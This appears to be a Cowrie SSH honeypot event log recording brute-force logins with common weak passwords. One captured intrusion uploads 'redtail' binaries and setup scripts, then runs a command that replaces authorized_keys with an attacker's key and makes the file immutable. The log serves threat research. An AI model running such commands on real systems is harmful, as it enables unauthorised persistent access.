openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:32.825673Z","src_ip":"14.103.129.89","session":"84c0671b7544"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":50174,"dst_ip":"1.2.3.4","dst_port":22,"session":"8af43f7f561c","protocol":"ssh","message":"New connection: 14.103.129.89:50174 (1.2.3.4:22) [session: 8af43f7f561c]","sensor":"my-vps","timestamp":"2025-08-26T10:21:39.048748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:21:39.049744Z","src_ip":"14.103.129.89","session":"8af43f7f561c"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.129.89","src_port":36368,"dst_ip":"1.2.3.4","dst_port":22,"session":"f20c3b21a390","protocol":"ssh","message":"New connection: 14.103.129.89:36368 (1.2.3.4:22) [session: f20c3b21a390]","sensor":"my-vps","timestamp":"2025-08-26T10:21:44.016654Z"}
{"eventid":"cowrie.session.closed","duration":"32.8","message":"Connection lost after 32.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:21:52.915028Z","src_ip":"14.103.129.89","session":"94ff32f2bf54"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:21:57.971646Z","src_ip":"14.103.129.89","session":"8af43f7f561c"}
{"eventid":"cowrie.session.closed","duration":"35.8","message":"Connection lost after 35.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:21:59.805288Z","src_ip":"14.103.129.89","session":"ff55a2a3bc1d"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T10:22:02.259975Z","src_ip":"14.103.129.89","session":"20b528f63d60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52970,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c1448340931","protocol":"ssh","message":"New connection: 212.227.235.229:52970 (1.2.3.4:22) [session: 0c1448340931]","sensor":"my-vps","timestamp":"2025-08-26T10:22:02.909642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:22:03.012154Z","src_ip":"212.227.235.229","session":"0c1448340931"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T10:22:03.299344Z","src_ip":"212.227.235.229","session":"0c1448340931"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:22:03.415782Z","src_ip":"14.103.129.89","session":"8af43f7f561c"}
{"eventid":"cowrie.login.success","username":"root","password":"12344321","message":"login attempt [root/12344321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:22:04.213257Z","src_ip":"212.227.235.229","session":"0c1448340931"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:22:04.513316Z","src_ip":"212.227.235.229","session":"0c1448340931"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41976,"dst_ip":"1.2.3.4","dst_port":22,"session":"8844ce3eb464","protocol":"ssh","message":"New connection: 212.227.235.229:41976 (1.2.3.4:22) [session: 8844ce3eb464]","sensor":"my-vps","timestamp":"2025-08-26T10:22:04.627932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:22:04.628938Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:22:04.730971Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.login.success","username":"root","password":"12344321","message":"login attempt [root/12344321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:22:05.044418Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.session.closed","duration":"99.3","message":"Connection lost after 99.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:22:15.699712Z","src_ip":"14.103.129.89","session":"20b528f63d60"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":58380,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f412c6a0d17","protocol":"ssh","message":"New connection: 196.251.86.249:58380 (1.2.3.4:22) [session: 1f412c6a0d17]","sensor":"my-vps","timestamp":"2025-08-26T10:22:16.773085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:22:17.318807Z","src_ip":"196.251.86.249","session":"1f412c6a0d17"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:22:17.319658Z","src_ip":"196.251.86.249","session":"1f412c6a0d17"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123qwe","message":"login attempt [oracle/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T10:22:19.732207Z","src_ip":"196.251.86.249","session":"1f412c6a0d17"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:22:21.378803Z","src_ip":"196.251.86.249","session":"1f412c6a0d17"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:22:22.333211Z","src_ip":"14.103.129.89","session":"3a2a54f7e1b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:22:30.472650Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-08-26T10:22:30.473389Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:22:30.577915Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-26T10:22:30.682579Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-26T10:22:30.684529Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-26T10:22:30.687287Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-26T10:22:30.689578Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-26T10:22:30.692009Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-26T10:22:30.693027Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.session.closed","duration":"26.2","message":"Connection lost after 26.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:22:30.801359Z","src_ip":"212.227.235.229","session":"8844ce3eb464"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:22:38.715595Z","src_ip":"14.103.129.89","session":"4bcfa8632e21"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:22:49.269159Z","src_ip":"14.103.129.89","session":"6e48f3442cf4"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:22:52.986267Z","src_ip":"14.103.129.89","session":"0b750d829a71"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:22:53.619518Z","src_ip":"14.103.129.89","session":"8e3c679c3472"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:22:56.756064Z","src_ip":"14.103.129.89","session":"46961043a139"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:22:56.971640Z","src_ip":"14.103.129.89","session":"441afdb892d5"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:04.729378Z","src_ip":"14.103.129.89","session":"22fe391cd243"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:06.143804Z","src_ip":"14.103.129.89","session":"5f4eedf2eeeb"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:07.801444Z","src_ip":"14.103.129.89","session":"f664b6a84c6f"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:08.792969Z","src_ip":"14.103.129.89","session":"2390942c05bd"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:09.625288Z","src_ip":"14.103.129.89","session":"2b50fa8106b6"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:09.717846Z","src_ip":"14.103.129.89","session":"3a2a54f7e1b8"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:11.537283Z","src_ip":"14.103.129.89","session":"d08c3c4001f4"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:11.562106Z","src_ip":"14.103.129.89","session":"3d0fa9918e05"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:11.565530Z","src_ip":"14.103.129.89","session":"3a9fc932d2f2"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:13.023546Z","src_ip":"14.103.129.89","session":"1125c726fc4d"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:15.020505Z","src_ip":"14.103.129.89","session":"32461bb6a7b4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":58832,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f29ffff37bd","protocol":"ssh","message":"New connection: 196.251.86.249:58832 (1.2.3.4:22) [session: 0f29ffff37bd]","sensor":"my-vps","timestamp":"2025-08-26T10:23:18.077971Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:23:18.699421Z","src_ip":"196.251.86.249","session":"0f29ffff37bd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:23:18.700112Z","src_ip":"196.251.86.249","session":"0f29ffff37bd"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"passpass","message":"login attempt [oracle/passpass] failed","sensor":"my-vps","timestamp":"2025-08-26T10:23:20.734330Z","src_ip":"196.251.86.249","session":"0f29ffff37bd"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:22.229711Z","src_ip":"196.251.86.249","session":"0f29ffff37bd"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:24.023324Z","src_ip":"14.103.129.89","session":"d1b4eeb5b44b"}
